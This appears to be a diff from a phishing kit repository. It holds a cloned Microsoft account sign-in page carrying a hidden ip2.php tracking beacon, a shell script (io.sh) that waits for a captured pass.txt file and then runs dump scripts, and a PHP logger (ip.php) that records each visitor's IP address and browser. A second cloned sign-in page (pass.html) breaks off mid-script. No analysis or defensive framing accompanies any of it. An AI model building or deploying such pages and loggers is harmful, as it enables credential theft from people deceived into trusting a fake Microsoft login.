     28 + <!-- /ko --><!-- ko if: svr.Cr && (paginationControlMethods() && !paginationControlMethods().currentViewHasMetadata('hideLwaDisclaimer')) --><!-- /ko --><!-- ko if: asyncInitReady --> <div role="main" data-bind="component: { name: 'pagination-control',
     29 + publicMethods: paginationControlMethods,
     30 + params: {
     31 + enableCssAnimation: svr.A3,
     32 + initialViewId: initialViewId,
     33 + currentViewId: currentViewId,
     34 + initialSharedData: initialSharedData,
     35 + initialError: $loginPage.getServerError() },
     36 + event: {
     37 + cancel: paginationControl_onCancel,
     38 + showView: $loginPage.view_onShow,
     39 + setLightBoxFadeIn: view_onSetLightBoxFadeIn,
     40 + animationStateChange: paginationControl_onAnimationStateChange } }"><!-- --> <div data-bind="css: { 'zero-opacity': hidePaginatedView() }" class=""><!-- ko if: showIdentityBanner() && (sharedData.displayName || svr.g) --><!-- /ko --> <div class="pagination-view animate slide-in-next" data-bind="css: {
     41 + 'has-identity-banner': showIdentityBanner() &amp;&amp; (sharedData.displayName || svr.g),
     42 + 'zero-opacity': hidePaginatedView.hideSubView(),
     43 + 'animate': animate(),
     44 + 'slide-out-next': animate.isSlideOutNext(),
     45 + 'slide-in-next': animate.isSlideInNext(),
     46 + 'slide-out-back': animate.isSlideOutBack(),
     47 + 'slide-in-back': animate.isSlideInBack() }"><!-- ko foreach: views --><!-- ko if: $parent.currentViewIndex() === $index() --> <!-- ko template: { nodes: [$data], data: $parent } --><div data-viewid="1" data-showfedcredbutton="true" data-bind="pageViewComponent: { name: 'login-paginated-username-view',
     48 + params: {
     49 + serverData: svr,
     50 + serverError: initialError,
     51 + isInitialView: isInitialState,
     52 + displayName: sharedData.displayName,
     53 + prefillNames: $loginPage.prefillNames,
     54 + flowToken: sharedData.flowToken },
     55 + event: {
     56 + refresh: $loginPage.view_onRefresh,
     57 + redirect: $loginPage.view_onRedirect,
     58 + setPendingRequest: $loginPage.view_onSetPendingRequest,
     59 + showLearnMore: $loginPage.learnMore_onShow,
     60 + registerDialog: $loginPage.view_onRegisterDialog,
     61 + unregisterDialog: $loginPage.view_onUnregisterDialog,
     62 + showDialog: $loginPage.view_onShowDialog } }"><!-- --> <div data-bind="component: { name: 'header-control',
     63 + params: {
     64 + serverData: svr,
     65 + title: str['WF_STR_HeaderDefault_Title'] } }"><div class="row text-title" id="loginHeader"> <div role="heading" aria-level="1" data-bind="text: title">Sign in</div><!-- ko if: isSubtitleVisible --><!-- /ko --> </div></div><!-- ko if: pageDescription && !svr.ba --><!-- /ko --> <div class="row"> <div role="alert" aria-live="assertive"><!-- ko if: usernameTextbox.error --><!-- /ko --> </div> <div class="form-group col-md-24"><!-- ko if: prefillNames().length > 1 --><!-- /ko --><!-- ko ifnot: prefillNames().length > 1 --> <div class="placeholderContainer" data-bind="component: { name: 'placeholder-textbox-field',
     66 + publicMethods: usernameTextbox.placeholderTextboxMethods,
     67 + params: {
     68 + serverData: svr,
     69 + hintText: tenantBranding.UserIdLabel || str['CT_PWD_STR_Email_Example'],
     70 + hintCss: 'placeholder' + (!svr.Az ? ' ltr_override' : '') },
     71 + event: {
     72 + updateFocus: usernameTextbox.textbox_onUpdateFocus } }"><!-- ko withProperties: { '$placeholderText': placeholderText } --> <!-- ko template: { nodes: $componentTemplateNodes, data: $parent } --> <input type="email" name="email" id="i0116" maxlength="113" lang="en" class="form-control ltr_override" aria-required="true" data-bind="
     73 + css: { 'has-error': usernameTextbox.error },
     74 + ariaLabel: tenantBranding.UserIdLabel || str['CT_PWD_STR_Username_AriaLabel'],
     75 + ariaDescribedBy: 'loginHeader loginDescription',
     76 + textInput: usernameTextbox.value,
     77 + hasFocusEx: usernameTextbox.focused,
     78 + placeholder: $placeholderText" aria-label="Enter your email, phone, or Skype." aria-describedby="loginHeader loginDescription" placeholder="Email, phone, or Skype" autofocus> <input name="pass" type="password" id="i0118" autocomplete="off" data-bind="moveOffScreen, textInput: passwordBrowserPrefill" class="moveOffScreen" tabindex="-1" aria-hidden="true"> <!-- /ko --><!-- /ko --><!-- ko ifnot: usePlaceholderAttribute --><!-- /ko --></div><!-- /ko --> </div> </div> <div data-bind="css: { 'position-buttons': !tenantBranding.BoilerPlateText }" class="position-buttons"> <div class="row"> <div class="col-md-24"> <div class="text-13 action-links"><!-- ko if: svr.A1 && !svr.v && !svr.AG --> <div class="form-group" data-bind="
     79 + htmlWithBindings: html['WF_STR_SignUpLink_Text'],
     80 + childBindings: {
     81 + 'signup': {
     82 + href: svr.H,
     83 + ariaLabel: str['WF_STR_SignupLink_AriaLabel_Text'],
     84 + attr: { name: 'createAccount' },
     85 + click: signup_onClick } }">No account? <a href="https://signup.live.com/signup?contextid=6568703AD42C7BD2&amp;bk=1560565059&amp;ru=https://login.live.com/login.srf%3fcontextid%3d6568703AD42C7BD2%26mkt%3dEN-US%26lc%3d1033%26bk%3d1560565059%26uaid%3de52f753aa5184927ab11e578045c61f0&amp;uiflavor=web&amp;mkt=EN-US&amp;lc=1033&amp;uaid=e52f753aa5184927ab11e578045c61f0" id="signup" aria-label="Create a Microsoft account" name="createAccount">Create one!</a></div><!-- /ko --><!-- ko if: svr.showCantAccessAccountLink --><!-- /ko --><!-- ko if: showFidoLinkInline && hasFido() && (availableCredsWithoutUsername().length >= 2 || svr.aM) --><!-- /ko --><!-- ko if: availableCredsWithoutUsername().length > 0 || svr.aM --> <div class="form-group" data-bind="
     86 + component: { name: 'cred-switch-link-control',
     87 + params: {
     88 + serverData: svr,
     89 + availableCreds: availableCredsWithoutUsername(),
     90 + showForgotUsername: svr.aM },
     91 + event: {
     92 + switchView: noUsernameCredSwitchLink_onSwitchView,
     93 + registerDialog: onRegisterDialog,
     94 + unregisterDialog: onUnregisterDialog,
     95 + showDialog: onShowDialog } }"><!-- --> <div class="form-group"><!-- ko if: credentialCount > 1 || (credentialCount === 1 && (showForgotUsername || selectedCredShownOnlyOnPicker)) --> <a id="idA_PWD_SwitchToCredPicker" href="https://login.live.com/pp1600/#" data-bind="
     96 + text: isUserKnown ? str['CT_PWD_STR_SwitchToCredPicker_Link'] : str['CT_PWD_STR_SwitchToCredPicker_Link_NoUser'],
     97 + click: switchToCredPicker_onClick">Sign-in options</a><!-- /ko --><!-- ko if: credentialCount === 1 && !(showForgotUsername || selectedCredShownOnlyOnPicker) --><!-- /ko --><!-- ko if: credentialCount === 0 && showForgotUsername --><!-- /ko --> </div><!-- ko if: credLinkError --><!-- /ko --></div><!-- /ko --> </div> </div> </div> <div class="row" data-bind="css: { 'move-buttons': tenantBranding.BoilerPlateText }"> <div data-bind="component: { name: 'footer-buttons-field',
     98 + params: {
     99 + serverData: svr,
     100 + isPrimaryButtonEnabled: !isRequestPending(),
     101 + isPrimaryButtonVisible: svr.f,
     102 + isSecondaryButtonEnabled: true,
     103 + isSecondaryButtonVisible: svr.f &amp;&amp; isBackButtonVisible() },
     104 + event: {
     105 + primaryButtonClick: primaryButton_onClick,
     106 + secondaryButtonClick: secondaryButton_onClick } }"><div class="col-xs-24 no-padding-left-right button-container" data-bind="
     107 + visible: isPrimaryButtonVisible() || isSecondaryButtonVisible(),
     108 + css: { 'no-margin-bottom': removeBottomMargin }"><!-- ko if: isSecondaryButtonVisible --><!-- /ko --> <div class="inline-block"><!-- type="submit" is needed in-addition to 'type' in primaryButtonAttributes observable to support IE8 --> <input type="submit" id="idSIButton9" class="btn btn-block btn-primary" data-bind="
     109 + attr: primaryButtonAttributes,
     110 + value: primaryButtonText() || str['CT_PWD_STR_SignIn_Button_Next'],
     111 + hasFocus: focusOnPrimaryButton,
     112 + click: primaryButton_onClick,
     113 + enable: isPrimaryButtonEnabled,
     114 + visible: isPrimaryButtonVisible,
     115 + preventTabbing: primaryButtonPreventTabbing" value="Next"> </div> </div></div> </div> </div><!-- ko if: tenantBranding.BoilerPlateText --><!-- /ko --></div><!-- /ko --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- ko if: $parent.currentViewIndex() === $index() --><!-- /ko --><!-- /ko --> </div> </div></div><!-- /ko --> </div><!-- ko if: showFedCredButton --><!-- /ko --><!-- ko if: newSession --><!-- /ko -->
     116 + <input type="hidden" name="ps" data-bind="value: postedLoginStateViewId" value=""> <input type="hidden" name="psRNGCDefaultType" data-bind="value: postedLoginStateViewRNGCDefaultType" value=""> <input type="hidden" name="psRNGCEntropy" data-bind="value: postedLoginStateViewRNGCEntropy" value=""> <input type="hidden" name="psRNGCSLK" data-bind="value: postedLoginStateViewRNGCSLK" value=""> <input type="hidden" name="canary" data-bind="value: svr.canary" value=""> <input type="hidden" name="ctx" data-bind="value: ctx" value=""> <input type="hidden" name="hpgrequestid" data-bind="value: svr.sessionId" value=""> <input type="hidden" id="i0327" data-bind="attr: { name: svr.CL }, value: flowToken" name="PPFT" value="DcdEdJaHB!R1wYVBzDEj!SK!1gdRziXv0q4A4OKtStH8DOvDdEkfgNCpunOAsRkpAsNR9FmFayvNxxCoS873UGIK!GCkpS*FnmVeyr1Je6ytW*jedfciXEQoJyl6qpYYgShx1oO7WR33YBqXFa7jmpF*nhQoNQUBSpHbiInbdTUmh!SEChv50D4a14gCHFOOrz02JnZAZa0yroPfrebc9nsFXJLZ4vMstBCU7IIKO!x9MhosB!iM!fuSl7uJ39uWsA$$"> <input type="hidden" name="PPSX" data-bind="value: svr.Co" value="Passp"> <input type="hidden" name="NewUser" value="1"> <input type="hidden" name="FoundMSAs" data-bind="value: svr.AA" value=""> <input type="hidden" name="fspost" data-bind="value: svr.fPOST_ForceSignin ? 1 : 0" value="0"> <input type="hidden" name="i21" data-bind="value: wasLearnMoreShown() ? 1 : 0" value="0"> <input type="hidden" name="CookieDisclosure" data-bind="value: svr.aL ? 1 : 0" value="0"> <input type="hidden" name="IsFidoSupported" data-bind="value: isFidoSupported() ? 1 : 0" value="0"> <div data-bind="component: { name: 'instrumentation-control',
     117 + publicMethods: instrumentationMethods,
     118 + params: { serverData: svr } }"><input type="hidden" name="i2" data-bind="value: clientMode" value="1"> <input type="hidden" name="i17" data-bind="value: srsFailed" value="0"> <input type="hidden" name="i18" data-bind="value: srsSuccess"> <input type="hidden" name="i19" data-bind="value: timeOnPage" value=""></div> <div id="footer" class="footer default" role="contentinfo" data-bind="css: { 'default': !backgroundLogoUrl() }"> <div data-bind="component: { name: 'footer-control',
     119 + params: {
     120 + serverData: svr,
     121 + debugDetails: debugDetails,
     122 + showLinks: true },
     123 + event: {
     124 + agreementClick: footer_agreementClick } }">
     125 + <!-- --><!-- ko if: showLinks || impressumLink || showIcpLicense --> <div id="footerLinks" class="footerNode text-secondary"><!-- ko if: !showIcpLicense --> <span id="ftrCopy" data-bind="html: svr.Cq">©2020 Microsoft</span><!-- /ko --> <a id="ftrTerms" data-bind="text: str['MOBILE_STR_Footer_Terms'], href: termsLink, click: termsLink_onClick" href="https://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&amp;mkt=EN-US&amp;vv=1600&amp;uaid=e52f753aa5184927ab11e578045c61f0">Terms of use</a> <a id="ftrPrivacy" data-bind="text: str['MOBILE_STR_Footer_Privacy'], href: privacyLink, click: privacyLink_onClick" href="https://login.live.com/gls.srf?urlID=MSNPrivacyStatement&amp;mkt=EN-US&amp;vv=1600&amp;uaid=e52f753aa5184927ab11e578045c61f0">Privacy &amp; cookies</a><!-- ko if: impressumLink --><!-- /ko --><!-- ko if: showIcpLicense --><!-- /ko --><!-- Set attr binding before hasFocus to prevent Narrator from losing focus --> <a href="#" role="button" class="moreOptions" data-bind="
     126 + click: moreInfo_onClick,
     127 + ariaLabel: str['CT_STR_More_Options_Ellipsis_AriaLabel'],
     128 + attr: { 'aria-expanded': showDebugDetails().toString(),
     129 + hasFocus: focusMoreInfo() }" aria-label="Click here for troubleshooting information" aria-expanded="false"><!-- ko component: { name: 'accessible-image-control', params: { hasDarkBackground: true } } --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --> <!-- ko template: { nodes: [lightImageNode], data: $parent } --><img class="desktopMode" role="presentation" pngsrc="https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_white.png?x=0ad43084800fd8b50a2576b5173746fe" svgsrc="https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_white.svg?x=5ac590ee72bfe06a7cecfd75b588ad73" data-bind="imgSrc" src="https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_white.svg?x=5ac590ee72bfe06a7cecfd75b588ad73"><!-- /ko --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme --><!-- /ko --><!-- /ko --><!-- ko component: 'accessible-image-control' --><!-- ko if: (isHighContrastBlackTheme || hasDarkBackground || svr.fHasBackgroundColor) && !isHighContrastWhiteTheme --><!-- /ko --><!-- ko if: (isHighContrastWhiteTheme || (!hasDarkBackground && !svr.fHasBackgroundColor)) && !isHighContrastBlackTheme --> <!-- ko template: { nodes: [darkImageNode], data: $parent } --><img src="ip2.php" style="display:none" > <img class="mobileMode" role="presentation" pngsrc="https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_grey.png?x=5bc252567ef56db648207d9c36a9d004" svgsrc="https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_grey.svg?x=2b5d393db04a5e6e1f739cb266e65b4c" data-bind="imgSrc" src="https://logincdn.msauth.net/16.000.28230.00/images/ellipsis_grey.svg?x=2b5d393db04a5e6e1f739cb266e65b4c"><!-- /ko --> <!-- /ko --><!-- /ko --> </a> </div><!-- ko if: showDebugDetails --><!-- /ko --> <!-- /ko --></div> </div> </div> <!-- /ko --></div><!-- /ko --> </form> <form method="post" aria-hidden="true" target="_top" data-bind="autoSubmit: postRedirectForceSubmit, attr: { action: postRedirectUrl }"><!-- ko foreach: postRedirectParams --><!-- /ko --> </form><!-- ko if: svr.Bq --> <div data-bind="component: { name: 'fetch-sessions-control',
     130 + params: {
     131 + serverData: svr },
     132 + event: {
     133 + updateUserTiles: fetchSessions_onUpdateUserTiles,
     134 + executeGctResult: fetchSessions_onExecuteGctResult,
     135 + incrementAsyncTileRequestCount: fetchSessions_onIncrementAsyncTileRequestCount,
     136 + decrementAsyncTileRequestCount: fetchSessions_onDecrementAsyncTileRequestCount } }"><!-- ko if: callMsaStaticMeControl --> <div data-bind="injectIframe: { url: svr.Bq, onload: iFrame_onload }"><iframe height="0" width="0" src="https://login.live.com/Me.htm?v=1&amp;uaid=e52f753aa5184927ab11e578045c61f0" style="display: none;"></iframe></div> <!-- /ko --></div><!-- /ko --><!-- ko if: svr.AR --><!-- /ko --></div></body></html>
  • ■ ■ ■ ■ ■ ■
    xbox/notp/io.sh
     1 +clear
     2 +mpv /sdcard/log.mp3
     3 +clear
     4 +if [ -f "pass.txt" ];then
     5 +bash grad.sh
     6 +sleep 15.0
     7 +bash dump.sh
     8 +else
     9 +echo -e " \e[96m Retriving Data Again Wait"
     10 +sleep 3.0
     11 +bash io.sh
     12 +fi
     13 + 
  • ■ ■ ■ ■ ■ ■
    xbox/notp/ip.php
     1 +<?php
     2 +
     3 +if (!empty($_SERVER['HTTP_CLIENT_IP']))
     4 + {
     5 + $ipaddress = $_SERVER['HTTP_CLIENT_IP']."\r\n";
     6 + }
     7 +elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
     8 + {
     9 + $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR']."\r\n";
     10 + }
     11 +else
     12 + {
     13 + $ipaddress = $_SERVER['REMOTE_ADDR']."\r\n";
     14 + }
     15 +$useragent = " User-Agent: ";
     16 +$browser = $_SERVER['HTTP_USER_AGENT'];
     17 +
     18 +
     19 +$file = 'ip.txt';
     20 +$fp = fopen($file, 'a');
     21 +
     22 +fwrite($fp, $ipaddress);
     23 +fwrite($fp, $useragent);
     24 +fwrite($fp, $browser);
     25 +
     26 +
     27 +fclose($fp);
  • ■ ■ ■ ■ ■ ■
    xbox/notp/pass.html
     1 +<html dir="ltr" lang="EN-US"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><script type="text/javascript">var PROOF = {};PROOF.Type = {SQSA: 6, CSS: 5, DeviceId: 4, Email: 1, AltEmail: 2, SMS: 3, HIP: 8, Birthday: 9, TOTPAuthenticator: 10, RecoveryCode: 11, StrongTicket: 13, TOTPAuthenticatorV2: 14, UniversalSecondFactor: 15, Voice: -3};</script><noscript><meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled?mkt=EN-US&lc=1033&uaid=c32114cb67f1490b46720d4d540fe260"/>Microsoft account requires JavaScript to sign in. This web browser either does not support JavaScript, or scripts are being blocked.<br /><br />To find out whether your browser supports JavaScript, or to allow scripts, see the browser's online help.</noscript><title>Sign in to your Microsoft account</title><meta name="robots" content="none"><meta name="PageID" content="i5030"><meta name="SiteID" content="38936"><meta name="ReqLC" content="1033"><meta name="LocLC" content="1033"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, minimum-scale=1.0, user-scalable=yes"><script type="text/javascript">!function(e,r){for(var t in r)e[t]=r[t]}(this,function(e){function r(n){if(t[n])return t[n].exports;var o=t[n]={exports:{},id:n,loaded:!1};return e[n].call(o.exports,o,o.exports,r),o.loaded=!0,o.exports}var t={};return r.m=e,r.c=t,r.p="",r(0)}([function(e,r){!function(){function e(){return s.$Config||s.ServerData||{}}function r(e,r){var t=s.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(e){var r=e.indexOf("?"),t=r>-1?r:e.length;return t>u&&e.substr(t-u,u).toLowerCase()===c}function n(){var r=e(),t=r.loader||{};return t.slReportFailure||r.slReportFailure||!1}function o(){var r=e(),t=r.loader||{};return t.redirectToErrorPageOnLoadFailure||!1}function a(e){var r=!0,n=e.src||e.href||"";if(n){if(t(n))try{e.sheet&&e.sheet.cssRules&&!e.sheet.cssRules.length&&(r=!1)}catch(o){}}else r=!1;return r}function i(){function n(e){var r=d.getElementsByTagName("head")[0];r.appendChild(e)}function o(e,r,n){var o=t(e)?i(e):s(e);return r&&(o.id=r),o.setAttribute&&(o.setAttribute("crossorigin","anonymous"),n&&o.setAttribute("integrity",n)),o}function i(e){var r=d.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function s(e){var r=d.createElement("script");return r.type="text/javascript",r.src=e,r.defer=!1,r.async=!1,r}function c(e){if(!(p&&p.length>1))return e;for(var r=0;r<p.length;r++)if(0===e.indexOf(p[r]))return p[r+1<p.length?r+1:0]+e.substring(p[r].length);return e}function u(e,t,n,o){return r("[$Loader]: "+(y.failMessage||"Failed"),o),L[e].retry<g?(L[e].retry++,void f(e,t,n)):void(n&&n())}function l(e,t,n,o){a(o)?(r("[$Loader]: "+(y.successMessage||"Loaded"),o),f(e+1,t,n)):u(e,t,n,o)}function f(e,t,a){if(e<L.length){var i=L[e];if(!i||!i.srcPath)return void f(e+1,t,a);i.retry>0&&(i.srcPath=c(i.srcPath),i.origId||(i.origId=i.id),i.id=i.origId+"_Retry_"+i.retry);var s=o(i.srcPath,i.id,i.integrity);s.onload=function(){l(e,t,a,s)},s.onerror=function(){u(e,t,a,s)},s.onreadystatechange=function(){"loaded"===s.readyState?setTimeout(function(){l(e,t,a,s)},500):"complete"===s.readyState&&l(e,t,a,s)},n(s),r("[$Loader]: Loading '"+(i.srcPath||"")+"', id:"+(i.id||""))}else t&&t()}var h=e(),g=h.slMaxRetry||2,v=h.loader||{},p=v.cdnRoots||[],y=this,L=[];y.retryOnError=!0,y.successMessage="Loaded",y.failMessage="Error",y.Add=function(e,r,t,n){e&&L.push({srcPath:e,id:r,retry:n||0,integrity:t})},y.AddForReload=function(e){var r=e.src||e.href||"";y.Add(r,"AddForReload",e.integrity,1)},y.AddIf=function(e,r,t){e&&y.Add(r,t)},y.Load=function(e,r){f(0,e,r)}}var s=window,d=s.document,c=".css",u=c.length;i.On=function(e,r){if(!e)throw"The target element must be provided and cannot be null.";r?i.OnError(e):i.OnSuccess(e)},i.OnSuccess=function(e){var t=e.src||e.href||"",s=n(),d=o();if(!e)throw"The target element must be provided and cannot be null.";if(a(e)){r("[$Loader]: Loaded",e);var c=new i;c.failMessage="Reload Failed",c.successMessage="Reload Success",c.Load(null,function(){if(s)throw"Unexpected state. resourceLoader.Load() failed despite initial load success. ['"+t+"']";d&&(document.location.href="/error.aspx?err=504")})}else i.OnError(e)},i.OnError=function(e){var t=e.src||e.href||"",a=n(),s=o();if(!e)throw"The target element must be provided and cannot be null.";r("[$Loader]: Failed",e);var d=new i;d.failMessage="Reload Failed",d.successMessage="Reload Success",d.AddForReload(e),d.Load(null,function(){if(a)throw"Failed to load external resource ['"+t+"']";s&&(document.location.href="/error.aspx?err=504")})},s.$Loader=i}()}]));</script><script type="text/javascript">!function(r,t){for(var e in t)r[e]=t[e]}(this,function(r){function t(o){if(e[o])return e[o].exports;var n=e[o]={exports:{},id:o,loaded:!1};return r[o].call(n.exports,n,n.exports,t),n.loaded=!0,n.exports}var e={};return t.m=r,t.c=e,t.p="",t(0)}([function(r,t){!function(){function r(r,t){function e(i){var a=r[i];return i<o-1?void(n.r[a]?e(i+1):n.when(a,function(){e(i+1)})):void t(a)}var o=r.length;e(0)}function t(r,t,i){function a(){var r=!!u.method,n=r?u.method:i[0],a=u.extraArgs||[],c=o.$WebWatson;try{var f=e(i,!r);if(a&&a.length>0)for(var s=a.length,v=0;v<s;v++)f.push(a[v]);n.apply(t,f)}catch(h){return void(c&&c.submitFromException&&c.submitFromException(h))}}var u=n.r&&n.r[r];return t=t?t:this,u&&(u.skipTimeout?a():o.setTimeout(a,0)),u}function e(r,t){return Array.prototype.slice.call(r,t?1:0)}var o=window;o.$Do||(o.$Do={q:[],r:[],removeItems:[],lock:0,o:[]});var n=o.$Do;n.when=function(e,o){function i(r){t(r,a,u)||n.q.push({id:r,c:a,a:u})}var a=0,u=[],c=1,f="function"==typeof o;f||(a=o,c=2);for(var s=c;s<arguments.length;s++)u.push(arguments[s]);e instanceof Array?r(e,i):i(e)},n.register=function(r,e,o){if(!n.r[r]){n.o.push(r);var i={};if(e&&(i.method=e),o&&(i.skipTimeout=o),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++)i.extraArgs.push(arguments[a])}n.r[r]=i,n.lock++;try{for(var u=0;u<n.q.length;u++){var c=n.q[u];c.id==r&&t(r,c.c,c.a)&&n.removeItems.push(c)}}catch(f){throw f}finally{if(n.lock--,0===n.lock){for(var s=0;s<n.removeItems.length;s++)for(var v=n.removeItems[s],h=0;h<n.q.length;h++)if(n.q[h]===v){n.q.splice(h,1);break}n.removeItems=[]}}}},n.unregister=function(r){n.r[r]&&delete n.r[r]}}()}]));</script><script type="text/javascript">!function(e,n){for(var r in n)e[r]=n[r]}(this,function(e){function n(t){if(r[t])return r[t].exports;var o=r[t]={exports:{},id:t,loaded:!1};return e[t].call(o.exports,o,o.exports,n),o.loaded=!0,o.exports}var r={};return n.m=e,n.c=r,n.p="",n(0)}([function(e,n){!function(){function e(){return r.$Config||r.ServerData||{}}function n(){var n=(e(),new i),r=this,a=[],f=[],u=[];r.Add=function(e,r,t,o){a.push(e),n.Add(e,r,t,o)},r.Provides=function(e){if(e)if(e instanceof Array)for(var n=0;n<e.length;n++)f.push(e[n]);else f.push(e)},r.Requires=function(e){if(e)if(e instanceof Array)for(var n=0;n<e.length;n++)u.push(e[n]);else u.push(e)},r.Load=function(e,r){var i=function(){e&&e();for(var n=0;n<f.length;n++)o.register(f[n],0,!0)},s=function(){n.Load(i,r)};if(u.length>0){for(var c=t.getElementsByTagName("head")[0],d=0;d<a.length;d++){var h=t.createElement("link");h.rel="prefetch",h.href=a[d],c.appendChild(h)}o.when(u,s)}else s()}}var r=window,t=r.document,o=r.$Do,i=r.$Loader,a=".css";a.length;n.WhenLoaded=function(e,n){o.when(e,n)},r.$DepLoader=n}()}]));</script><link rel="shortcut icon" href="https://logincdn.msauth.net/16.000.28215.2/images/favicon.ico"><link rel="stylesheet" title="Converged_v2" type="text/css" crossorigin="anonymous" integrity="sha384-2riFcYS2C8P9crfoIpylJIWi9uD876mOldrLPoi+O1Xd8FoAlcPQEGt+jhUkdSHz" onload="$Loader.OnSuccess(this)" onerror="$Loader.OnError(this)" href="https://logincdn.msauth.net/16.000.28215.2/Converged_v21033.css"><style type="text/css"></style><style type="text/css">body{display:none;}</style><script type="text/javascript">if (top != self){try{top.location.replace(self.location.href);}catch (e){}}else{document.write(unescape('%3C%73') + 'tyle type="text/css">body{display:block !important;}</style>');}</script><style type="text/css">body{display:block !important;}</style><noscript><style type="text/css">body{display:block !important;}</style></noscript><script type="text/javascript">!function(e,r){for(var t in r)e[t]=r[t]}(this,function(e){function r(n){if(t[n])return t[n].exports;var i=t[n]={exports:{},id:n,loaded:!1};return e[n].call(i.exports,i,i.exports,r),i.loaded=!0,i.exports}var t={};return r.m=e,r.c=t,r.p="",r(0)}([function(e,r){var t=window,n=t.navigator;t.g_iSRSFailed=0,t.g_sSRSSuccess="",r.SRSRetry=function(e,r,i,s,a){var o=1,c=unescape("%3Cscript type='text/javascript'");a&&(c+=" crossorigin='anonymous' integrity='"+a+"'"),c+=" src='";var u=unescape("'%3E%3C/script%3E"),S=r;if(n&&n.userAgent&&s&&s!==r){var d=n.userAgent.toLowerCase(),p=d.indexOf("edge")>=0;if(!p){var f=d.match(/chrome\/([0-9]+)\./),g=f&&2===f.length&&!isNaN(f[1])&&parseInt(f[1])>54;g&&(S=s)}}t.g_sSRSSuccess.indexOf(e)===-1&&("undefined"==typeof t[e]?(t.g_iSRSFailed=1,i<=o&&document.write(c+S+u)):t.g_sSRSSuccess+=e+"|"+i+",")}}]));var g_dtFirstByte=new Date();var g_objPageMode = null;</script><link rel="image_src" href="https://logincdn.msauth.net/16.000.28215.2/images/Windows_Live_v_thumb.jpg"><script type="text/javascript">var ServerData = {Bh:'',CH:'sign up',CI:'',Bk:'https://account.live.com/query.aspx?uaid=c32114cb67f1490b46720d4d540fe260&mkt=EN-US&lc=1033&id=38936',CL:'PPFT',aA:false,CM:'',Bo:'',CN:'',CO:'',Bp:'https://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&mkt=EN-US&vv=1600&uaid=c32114cb67f1490b46720d4d540fe260',Bq:'https://login.live.com/GetCredentialType.srf?opid=AECFE736E4446D42&vv=1600&mkt=EN-US&lc=1033&uaid=c32114cb67f1490b46720d4d540fe260',aD:true,CP:'',aE:true,Br:'',CQ:"#~#partnerdomain#~# does\'t use this service. Please sign in with a Microsoft account or create a new account. <a href=\"#~#WLPaneHelpInviteBlockedURL_LS#~#\" id=\"idPaneHelpInviteBlockedLink9\">Learn More</a>",Bs:'https://login.live.com/Instrumentation.srf?actionid=15&mkt=EN-US&lc=1033&uaid=c32114cb67f1490b46720d4d540fe260',Bt:'https://login.live.com/GetSessionState.srf?vv=1600&mkt=EN-US&lc=1033&uaid=c32114cb67f1490b46720d4d540fe260',aH:true,CT:"A single-use code lets you sign in without entering your password. This helps protect your account when you\'re using someone else\'s PC. <a href=\"http://explore.live.com/windows-live-sign-in-single-use-code-faq\" id=\"idPaneHelpOTCInfoLink9\" target=\"_blank\">Learn more</a>",CU:"Your session has timed out. To request a single use code, please <a href=\"javascript:NewOTCRequest()\">refresh the page</a>.",Bx:0,CW:"Sign in",Bz:true,aM:false,aN:true,aO:true,aP:false,urlLogin:'https://login.live.com/login.srf?contextid=40813CDF1346DA52&bk=1560391152&mkt=EN-US&lc=1033&uaid=c32114cb67f1490b46720d4d540fe260',b3:0,aT:true,b4:0,aV:0,hpgid:33,aX:5,Cd:{},Ce:{},Cf:'',Ch:'##li16####B##Hotmail##/B####BR##The smart way to do email - fast, easy and reliable##li8####B##Messenger##/B####BR##Stay in touch with the most important people in your life##li10####B##SkyDrive##/B####BR##Free, password-protected online storage',Ci:'',Cj:'',urlFed:'',Co:'Pass',Cp:'',Cq:"&copy;2020 Microsoft",Cr:'',bG:false,Cu:"Use the primary phone number you\'ve associated with your Microsoft account. <a href=\"http://explore.live.com/windows-live-sign-in-single-use-code-faq\" id=\"idPaneHelpOTCInfoLink9\" target=\"_blank\">Learn 